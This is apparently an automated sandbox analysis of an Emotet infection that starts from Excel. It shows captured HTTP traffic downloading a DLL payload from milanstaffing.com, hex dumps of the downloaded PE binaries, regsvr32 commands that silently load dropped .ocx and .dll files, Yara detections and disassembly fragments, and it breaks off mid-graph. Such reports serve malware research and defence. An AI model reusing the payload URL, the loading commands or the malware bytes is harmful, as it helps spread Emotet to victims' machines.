10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEd{b" 5@P .text `.rdata4 @@.data7@.pdata@@.rsrc@@.reloc
                              May 23, 2022 09:11:01.798969030 CEST650INData Raw: 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii: @B
                              May 23, 2022 09:11:01.798998117 CEST651INData Raw: 34 76 c7 45 c0 59 4d 91 08 c7 45 c4 22 42 51 61 c7 45 c8 3c ad 27 30 c7 45 cc 45 41 0f 25 c7 45 d0 a6 14 48 2b c7 45 d4 65 21 68 8f c7 45 d8 ac 1d 38 63 c7 45 dc 6a 53 0b 32 c7 45 e0 34 f8 f1 78 c7 45 e4 50 76 35 3d c7 45 e8 91 09 12 39 c7 45 ec
                              Data Ascii: 4vEYME"BQaE<'0EEA%EH+Ee!hE8cEjS2E4xEPv5=E9E<]ElOE'L#EAE:PtE'N8E1>#JEuJE@,:E5uEPKEsE# E )E$Ee&E(r#E,4XE0AE4pE8$ /E<@"/E@$ED 5.EH
                              May 23, 2022 09:11:01.799025059 CEST652INData Raw: c7 85 10 02 00 00 2d ec 7e 35 c7 85 14 02 00 00 fe 27 4e 58 c7 85 18 02 00 00 2b 38 30 5a c7 85 1c 02 00 00 b3 10 75 2a c7 85 20 02 00 00 67 28 25 22 c7 85 24 02 00 00 f1 35 75 33 c7 85 28 02 00 00 49 18 01 4d c7 85 2c 02 00 00 2f c9 17 01 c7 85
                              Data Ascii: -~5'NX+80Zu* g(%"$5u3(IM,/046$-8p<R@;D$SHULAPlO)T'J:XA!\:-ZZ`'Npd%2[h0-RlAip
                              May 23, 2022 09:11:01.799052000 CEST654INData Raw: e9 41 c7 85 28 04 00 00 11 2b e9 c1 c7 85 2c 04 00 00 43 13 da ee c7 85 30 04 00 00 3c 57 9e fd c7 85 34 04 00 00 64 49 d3 9f c7 85 38 04 00 00 43 76 da 42 c7 85 3c 04 00 00 7d 69 b2 c3 c7 85 40 04 00 00 69 42 7a 1e c7 85 44 04 00 00 b2 5e 13 9d
                              Data Ascii: A(+,C0<W4dI8CvB<}i@iBzD^H-`LdPHT>tTX\6q`Qdlh6h;#l-p"mtHxd|6uzJ\
                              May 23, 2022 09:11:01.799078941 CEST655INData Raw: e2 17 1f 4d c7 85 40 06 00 00 ec 9f 10 31 c7 85 44 06 00 00 64 55 62 a4 c7 85 48 06 00 00 74 c6 9b 0c c7 85 4c 06 00 00 1d bb 38 a5 c7 85 50 06 00 00 c1 29 61 28 c7 85 54 06 00 00 d3 be 14 25 c7 85 58 06 00 00 61 a6 a5 74 c7 85 5c 06 00 00 b7 cc
                              Data Ascii: M@1DdUbHtL8P)a(T%Xat\`9"dahDltJMpV0tRyix`M|dW$BxDt6rn&.5%Y\?0,'
                              May 23, 2022 09:11:01.799108028 CEST657INData Raw: 00 00 64 a7 14 b3 c7 85 58 08 00 00 18 70 50 32 c7 85 5c 08 00 00 0c 33 ba 42 c7 85 60 08 00 00 b2 d6 51 53 c7 85 64 08 00 00 3c e1 6c a3 c7 85 68 08 00 00 ba 80 81 3b c7 85 6c 08 00 00 ea 90 15 64 c7 85 70 08 00 00 b1 8c 80 55 c7 85 74 08 00 00
                              Data Ascii: dXpP2\3B`QSd<lh;ldpUt&"xIH|ZpVV?x.>w NjI"WzA8#'4+k
                              May 23, 2022 09:11:01.799134016 CEST658INData Raw: 6c 0a 00 00 b7 15 90 bd c7 85 70 0a 00 00 38 09 55 95 c7 85 74 0a 00 00 b6 0a ae 53 c7 85 78 0a 00 00 49 87 23 a5 c7 85 7c 0a 00 00 6f 52 50 e3 c7 85 80 0a 00 00 15 5c ab 86 48 8d 0d 01 f5 01 00 c7 85 84 0a 00 00 24 76 22 50 c7 85 88 0a 00 00 5b
                              Data Ascii: lp8UtSxI#|oRP\H$v"P[8|PW?6Y"pvv++o(Rg~iC"syvA)3HuH"E3E3F
                              May 23, 2022 09:11:01.799160004 CEST660INData Raw: 08 48 0f c3 51 10 48 83 c1 40 48 0f c3 51 d8 48 0f c3 51 e0 49 ff c9 48 0f c3 51 e8 48 0f c3 51 f0 48 0f c3 51 f8 75 d0 f0 80 0c 24 00 e9 54 ff ff ff cc cc cc cc cc cc 4c 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 48 83 7c 24 58 01 0f 85 ad
                              Data Ascii: HQH@HQHQIHQHQHQu$TLD$T$HL$HH|$XTu3^uT3SkHwRH;B}T3\!L|I|3;tHT3)Y;s
                              May 23, 2022 09:11:01.799185991 CEST661INData Raw: 00 00 48 8b 4c 24 78 48 8b 00 48 2b c1 48 89 44 24 68 48 8b 84 24 c8 00 00 00 48 8b 40 38 48 89 84 24 88 00 00 00 48 8b 84 24 b0 00 00 00 8b 40 04 83 e0 66 85 c0 0f 85 04 02 00 00 48 8b 84 24 b0 00 00 00 48 89 44 24 38 48 8b 84 24 c0 00 00 00 48
                              Data Ascii: HL$xHH+HD$hH$H@8H$H$@fH$HD$8H$HD$@H$@HD$0D$0D$0H$9D$0D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|XD$0HkH$|
                              May 23, 2022 09:11:01.923927069 CEST663INData Raw: 8b 44 24 30 48 c7 40 08 ff ff ff ff b8 01 00 00 00 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 83 3d 25 72 02 00 ff 74 16 8b 0d 1d 72 02 00 ff 15 a7 e2 01 00 c7 05 0d 72 02 00 ff ff ff ff e8 88 52 00 00 48 83 c4 28 c3 cc
                              Data Ascii: D$0H@HHH(=%rtrrRH(HT$HL$H(HD$0HvHHD$0@HD$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0HT/T


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              3192.168.2.2249176107.189.3.3980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              TimestampkBytes transferredDirectionData
                              May 23, 2022 09:11:05.086694002 CEST1040OUTGET /images/D4TRnDubF/ HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: milanstaffing.com
                              Connection: Keep-Alive
                              May 23, 2022 09:11:05.140671968 CEST1042INHTTP/1.1 200 OK
                              Connection: Keep-Alive
                              Keep-Alive: timeout=5, max=100
                              x-powered-by: PHP/7.0.33
                              set-cookie: 628b33891c2fb=1653289865; expires=Mon, 23-May-2022 07:12:05 GMT; Max-Age=60; path=/
                              cache-control: no-cache, must-revalidate
                              pragma: no-cache
                              last-modified: Mon, 23 May 2022 07:11:05 GMT
                              expires: Mon, 23 May 2022 07:11:05 GMT
                              content-type: application/x-msdownload
                              content-disposition: attachment; filename="T35PENELLOsp.dll"
                              content-transfer-encoding: binary
                              content-length: 371200
                              date: Mon, 23 May 2022 07:11:05 GMT
                              server: LiteSpeed
                              vary: User-Agent
                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEd{b" 5@P .text `.rdata4 @@.data7@.pdata@@.rsrc@@.reloc@B
                              May 23, 2022 09:11:05.140707970 CEST1043INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Data Ascii:
                              May 23, 2022 09:11:05.140724897 CEST1045INData Raw: c7 45 d4 65 21 68 8f c7 45 d8 ac 1d 38 63 c7 45 dc 6a 53 0b 32 c7 45 e0 34 f8 f1 78 c7 45 e4 50 76 35 3d c7 45 e8 91 09 12 39 c7 45 ec 1d 3c 5d 0e c7 45 f0 a5 6c 4f 0d c7 45 f4 27 4c 03 23 c7 45 f8 93 03 41 1d c7 45 fc 09 3a 50 74 c7 45 00 fe 27
                              Data Ascii: Ee!hE8cEjS2E4xEPv5=E9E<]ElOE'L#EAE:PtE'N8E1>#JEuJE@,:E5uEPKEsE# E )E$Ee&E(r#E,4XE0AE4pE8$ /E<@"/E@$ED 5.EHAELPEP"_ET<3EX39E\x
                              May 23, 2022 09:11:05.140743017 CEST1046INData Raw: 10 75 2a c7 85 20 02 00 00 67 28 25 22 c7 85 24 02 00 00 f1 35 75 33 c7 85 28 02 00 00 49 18 01 4d c7 85 2c 02 00 00 2f c9 17 01 c7 85 30 02 00 00 05 96 11 ef c7 85 34 02 00 00 36 24 12 2d c7 85 38 02 00 00 ee 70 95 0c c7 85 3c 02 00 00 0c 52 02
                              Data Ascii: u* g(%"$5u3(IM,/046$-8p<R@;D$SHULAPlO)T'J:XA!\:-ZZ`'Npd%2[h0-RlAipN7#6tY&xV|
                              May 23, 2022 09:11:05.140759945 CEST1047INData Raw: 00 64 49 d3 9f c7 85 38 04 00 00 43 76 da 42 c7 85 3c 04 00 00 7d 69 b2 c3 c7 85 40 04 00 00 69 42 7a 1e c7 85 44 04 00 00 b2 5e 13 9d c7 85 48 04 00 00 2d ce a9 60 c7 85 4c 04 00 00 64 1e ea 16 c7 85 50 04 00 00 88 48 ea da c7 85 54 04 00 00 c1
                              Data Ascii: dI8CvB<}i@iBzD^H-`LdPHT>tTX\6q`Qdlh6h;#l-p"mtHxd|6uzJ\Ng(kjQCeM
                              May 23, 2022 09:11:05.140778065 CEST1049INData Raw: 06 00 00 1d bb 38 a5 c7 85 50 06 00 00 c1 29 61 28 c7 85 54 06 00 00 d3 be 14 25 c7 85 58 06 00 00 61 a6 a5 74 c7 85 5c 06 00 00 b7 cc ae 8b c7 85 60 06 00 00 b7 13 39 22 c7 85 64 06 00 00 e7 0c 61 dc c7 85 68 06 00 00 97 ff 9c 44 c7 85 6c 06 00
                              Data Ascii: 8P)a(T%Xat\`9"dahDltJMpV0tRyix`M|dW$BxDt6rn&.5%Y\?0,'aPKxI
                              May 23, 2022 09:11:05.140794992 CEST1050INData Raw: 85 64 08 00 00 3c e1 6c a3 c7 85 68 08 00 00 ba 80 81 3b c7 85 6c 08 00 00 ea 90 15 64 c7 85 70 08 00 00 b1 8c 80 55 c7 85 74 08 00 00 e8 dc 26 22 c7 85 78 08 00 00 49 c4 12 48 c7 85 7c 08 00 00 d4 ec 01 5a c7 85 80 08 00 00 a6 af 70 56 c7 85 84
                              Data Ascii: d<lh;ldpUt&"xIH|ZpVV?x.>w NjI"WzA8#'4+kAkD}LhH
                              May 23, 2022 09:11:05.140811920 CEST1052INData Raw: a5 c7 85 7c 0a 00 00 6f 52 50 e3 c7 85 80 0a 00 00 15 5c ab 86 48 8d 0d 01 f5 01 00 c7 85 84 0a 00 00 24 76 22 50 c7 85 88 0a 00 00 5b e4 d0 38 c7 85 8c 0a 00 00 95 ff 98 16 c7 85 90 0a 00 00 da 7c 50 57 c7 85 94 0a 00 00 98 3f 36 8d c7 85 98 0a
                              Data Ascii: |oRP\H$v"P[8|PW?6Y"pvv++o(Rg~iC"syvA)3HuH"E3E3FH$A@A0
                              May 23, 2022 09:11:05.140830040 CEST1053INData Raw: f8 75 d0 f0 80 0c 24 00 e9 54 ff ff ff cc cc cc cc cc cc 4c 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 48 83 7c 24 58 01 0f 85 ad 00 00 00 e8 9e 54 00 00 85 c0 75 07 33 c0 e9 a9 01 00 00 e8 5e 09 00 00 85 c0 75 0c e8 f5 54 00 00 33 c0 e9 94
                              Data Ascii: u$TLD$T$HL$HH|$XTu3^uT3SkHwRH;B}T3\!L|I|3;tHT3)Y;sk|$XuY=X~DP
                              May 23, 2022 09:11:05.140847921 CEST1054INData Raw: 00 48 8b 84 24 b0 00 00 00 8b 40 04 83 e0 66 85 c0 0f 85 04 02 00 00 48 8b 84 24 b0 00 00 00 48 89 44 24 38 48 8b 84 24 c0 00 00 00 48 89 44 24 40 48 8b 84 24 c8 00 00 00 8b 40 48 89 44 24 30 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 84 24 88 00
                              Data Ascii: H$@fH$HD$8H$HD$@H$@HD$0D$0D$0H$9D$0D$0HkH$DH9D$hD$0HkH$DH9D$hsD$0HkH$|XD$0HkH$|uD$H3D$0HkH$DHD$x
                              May 23, 2022 09:11:05.170115948 CEST1056INData Raw: 83 ec 28 83 3d 25 72 02 00 ff 74 16 8b 0d 1d 72 02 00 ff 15 a7 e2 01 00 c7 05 0d 72 02 00 ff ff ff ff e8 88 52 00 00 48 83 c4 28 c3 cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 8d 0d 76 f7 01 00 48 89 88 a0 00 00 00 48 8b
                              Data Ascii: (=%rtrrRH(HT$HL$H(HD$0HvHHD$0@HD$0@HD$0HD$0tCHD$0CHD$0HxHSTHD$0HT/THD$0HL$8HHD$0HuH


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:09:10:16
                              Start date:23/05/2022
                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                              Imagebase:0x13ffa0000
                              File size:28253536 bytes
                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:3
                              Start time:09:10:26
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.926422500.0000000000300000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Target ID:4
                              Start time:09:10:28
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1218942103.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1219771205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Target ID:5
                              Start time:09:10:29
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.935437838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.935123835.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Target ID:6
                              Start time:09:10:29
                              Start date:23/05/2022
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                              Imagebase:0xff7d0000
                              File size:27136 bytes
                              MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Target ID:7
                              Start time:09:10:31
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll"
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1218923490.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1219645231.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Target ID:8
                              Start time:09:10:34
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.944087304.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.943168453.00000000002D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Target ID:9
                              Start time:09:10:36
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll"
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1218912030.0000000000150000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1219706572.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

                              General

                              Target ID:10
                              Start time:09:10:36
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.950850615.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.951348566.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security

                              General

                              Target ID:11
                              Start time:09:10:39
                              Start date:23/05/2022
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll"
                              Imagebase:0xff5b0000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.1219777301.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.1218930467.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:7.2%
                                Dynamic/Decrypted Code Coverage:2.3%
                                Signature Coverage:10.3%
                                Total number of Nodes:1849
                                Total number of Limit Nodes:30
                                execution_graph 16388 7fef9d23110 16391 7fef9d211e0 16388->16391 16392 7fef9d211f8 RtlExitUserProcess 16391->16392 16653 7fef9d30215 16654 7fef9d30231 16653->16654 16658 7fef9d30302 16653->16658 16724 7fef9d38c80 16654->16724 16656 7fef9d30489 16744 7fef9d32d80 16656->16744 16661 7fef9d3040d 16658->16661 16731 7fef9d38c30 16658->16731 16659 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16662 7fef9d3027e OutputDebugStringW 16659->16662 16661->16656 16664 7fef9d31640 17 API calls 16661->16664 16665 7fef9d30296 OutputDebugStringW OutputDebugStringW OutputDebugStringW OutputDebugStringW 16662->16665 16663 7fef9d304a3 16666 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16663->16666 16668 7fef9d3045c 16664->16668 16677 7fef9d302f2 16665->16677 16670 7fef9d304d0 16666->16670 16671 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16668->16671 16672 7fef9d3053d 16670->16672 16673 7fef9d32d80 17 API calls 16670->16673 16679 7fef9d30583 16670->16679 16671->16656 16674 7fef9d32d80 17 API calls 16672->16674 16675 7fef9d30510 16673->16675 16676 7fef9d30556 16674->16676 16680 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16675->16680 16681 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16676->16681 16682 7fef9d23280 __GSHandlerCheck 8 API calls 16677->16682 16678 7fef9d30357 16683 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16678->16683 16684 7fef9d303af 16678->16684 16757 7fef9d31590 16679->16757 16680->16672 16681->16679 16686 7fef9d30cae 16682->16686 16683->16684 16684->16661 16734 7fef9d31640 16684->16734 16687 7fef9d303e0 16689 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16687->16689 16689->16661 16690 7fef9d305fa 16691 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16690->16691 16692 7fef9d30652 16690->16692 16691->16692 16693 7fef9d31640 17 API calls 16692->16693 16696 7fef9d306b0 16692->16696 16694 7fef9d30683 16693->16694 16695 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16694->16695 16695->16696 16697 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16696->16697 16698 7fef9d30769 16697->16698 16699 7fef9d2d490 std::exception::_Copy_str 17 API calls 16698->16699 16714 7fef9d307bd 16698->16714 16700 7fef9d30790 16699->16700 16701 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16700->16701 16701->16714 16702 7fef9d30905 16702->16677 16703 7fef9d30a26 16702->16703 16704 7fef9d309a4 GetFileType 16702->16704 16705 7fef9d30ba5 16703->16705 16706 7fef9d30b97 OutputDebugStringW 16703->16706 16708 7fef9d309d0 16704->16708 16712 7fef9d309ce 16704->16712 16705->16677 16709 7fef9d30c23 16705->16709 16711 7fef9d38c80 _itow_s 17 API calls 16705->16711 16706->16705 16710 7fef9d309dd WriteConsoleW 16708->16710 16761 7fef9d2b470 16709->16761 16710->16703 16715 7fef9d30a2b GetLastError 16710->16715 16713 7fef9d30bf6 16711->16713 16716 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 16712->16716 16717 7fef9d27ff0 _invoke_watson_if_error 16 API calls 16713->16717 16714->16702 16760 7fef9d29360 LeaveCriticalSection 16714->16760 16715->16703 16715->16712 16719 7fef9d30ab5 16716->16719 16717->16709 16720 7fef9d30b26 WriteFile 16719->16720 16721 